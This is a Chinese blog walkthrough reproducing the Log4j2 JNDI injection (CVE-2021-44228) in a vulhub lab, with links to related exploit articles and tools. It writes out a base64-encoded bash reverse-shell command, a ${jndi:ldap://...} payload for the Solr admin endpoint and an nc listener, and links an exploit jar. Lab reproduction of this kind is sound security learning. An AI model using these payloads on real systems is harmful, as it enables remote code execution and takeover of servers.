Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)

最新推荐文章于 2024-03-03 21:47:44 发布
最新推荐文章于 2024-03-03 21:47:44 发布
阅读量1.2k 收藏 1
点赞数
文章标签: log4j web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/makboli/article/details/126548123
版权

漏洞背景

Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。

2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:ldap:是不安全的或者可以允许远程代码执行。

复现过程

首先进入vulhub靶场,找到log4j文件下的CVE-2021-44228后启动环境
请添加图片描述
启动成功后进入环境:ip:8983
在这里插入图片描述
进入后去寻找注入点可参考dnslog.cn,这里不再多说。
找到方向之后,下面讲一下反弹shell的过程
利用到github上的一个JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar构造payload
工具链接:https://pan.baidu.com/s/1L1z3LpTBMtb7VzEVyfaLqg?pwd=75vt
提取码:75vt

启用工具构建payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk2LjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}” -A “ip地址”

请添加图片描述
这里解释一下bash -C后面的命令需要进行base64编码加密,IP为反弹shell 的地址和端口,这里是6666端口在这里插入图片描述
执行之后会看到熟悉的rmi和idap,利用工具生成了恶意的命令和url
下面到环境里执行恶意代码

ip:/solr/admin/cores?action=${jndi:ldap://ip:1389/i6ik5y}

请添加图片描述发现成功重定向恶意类地址

在这里插入图片描述
另起一个终端监听端口

nc -lvvp 6666

此时会成功反弹shell,然后执行whoami
复现成功
也可能会因为靶场和环境问题,监听不到反弹shell,此时换其他靶场即可,比如封神台等等

芝士TOM
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。 QAQ 功能 本工具支持了利用JNDI注入构造多种恶意负载,其中包括: 名称 功能 简介 基本信息 获取服务器基础信息 打印出System.getProperties()中的信息 命令 命令执行 反射调用forkandexec执行命令 数据源黑客 获取Spring DataSource明文 获取缓存在某些中的数据源 目录列表 目录遍历 使用File对象列目录 FileDelete 文件删除 使用File对象删除文件 文件读取 文件读取 使用FileInputStream读取文件 文件写入 文件写入 使用
Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
qq_41696518的博客
06-13 834
环境:使用Vulhub的漏洞环境工具:bp和JNDIExploit-1-1.2,需要Java环境!!
JNDI注入详解(自学)
最新发布
m0_64481831的博客
03-03 1041
Jndi叫Java命名和目录的接口,可以类比为一个字典(就比如用一个目录路径去定义一个文件,目录路径和文件就是键值)。在Java应用中除了以常规方式使用名称服务(比如使用DNS解析域名) ,另一个常见的用法是使用目录服务作为对象存储的系统来存储和获取Java对象(比如使用打印机,在目录服务查找打印机然后获得一个打印机对象)。Jndi包含在Java SE平台。要使用Jndi,您必须拥有Jndi类和一个或多个服务提供者(SPI)。JDK包含以下命名/目录服务的服务提供者:轻量级目录访问协议(LDAP。
Log4j2远程命令执行(CVE-2021-44228)
weixin_48817799的博客
01-25 1055
Log4j2远程命令执行(CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
Vulfocus复现log4j2和vulhub复现log4j2(CVE-2021-44228)
人若有志,就不会在半坡停止。
11-07 853
由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。Log4j 是一款开源 Java 日志记录工具。日志记录主要用来监视代码中变量的变化情况,周期性的记录到文件中供其他应用进行统计分析工作;跟踪代码运行时轨迹,作为日后审计的依据;担当集成开发环境中的调试器的作用,向文件或控制台打印代码的调试信息。
掌控者-封神台-Apache Log4j任意代码执行复现
weixin_43821278的博客
04-06 5526
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结 一、工具 JNDIExploit-1.2-SNAPSHOT.jar 二、靶场 看网页源码 猜测就是username和password为注入点 三、步骤 vps有java环境 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP 成功运行 向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.
log4j关于JNDI注入漏洞验证及修复
影子的博客
12-11 7435
log4j关于JNDI注入漏洞验证及修复一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞复现八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
Apache Log4j2代码执行漏洞复现(cve-2021-44228)
Bird&Bird
12-14 9264
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)
柠檬i的博客
04-24 95
目录: 一、搭建环境1. 首先拉一个docker镜像2. 然后启动环境 二、获取shell首先,试验一下DNSLog1. 准备JNDI注入工具下载进入目录打包成jar包 2. 利用生成payload...
Log4j 漏洞复现GetShell
weixin_43102772的博客
03-09 385
Log4j2 漏洞复现GetShell
CVE-2021-2109:通过JNDICVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1....步骤3:设定JNDI伺服器 java -cp marshals
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C ...
log4j-2.15.0-rc2.zip
12-11
修复log4j关于JNDI注入漏洞注入的jar升级包,内附漏洞验证方式
CVE-2018-3191利用exp
01-08
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限
从0到1java安全5
qq_29948489的博客
05-19 288
在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上是标准的数据交换格式。分析漏洞利用,输出转换的数据类型(类),有一个@type的参数,默认有但是不显示,这里使用 SerializerFeature.WriteClassName,来显示这个参数。我们IDEA设置Maven的时候可以看到,其实IDEA已经自带了Maven,直接配置IDEA中的Maven可以省去下载Maven的步骤了。
Log4j2 CVE-2021-44228漏洞经典复现超详细(vulhub靶场)
精品博客,你值得一看~
08-06 629
log4j2漏洞复现,vulhub漏洞复现,Log4j2 CVE-2021-44228漏洞经典复现(vulhub靶场)
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
05-31
要验证是否存在Apache Log4j2远程代码执行漏洞(CVE-2021-44228),可以使用以下步骤: 1. 确认您的应用程序中是否使用了Apache Log4j2。检查您的应用程序的依赖库和配置文件。 2. 确认您的应用程序是否使用了Log4j2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值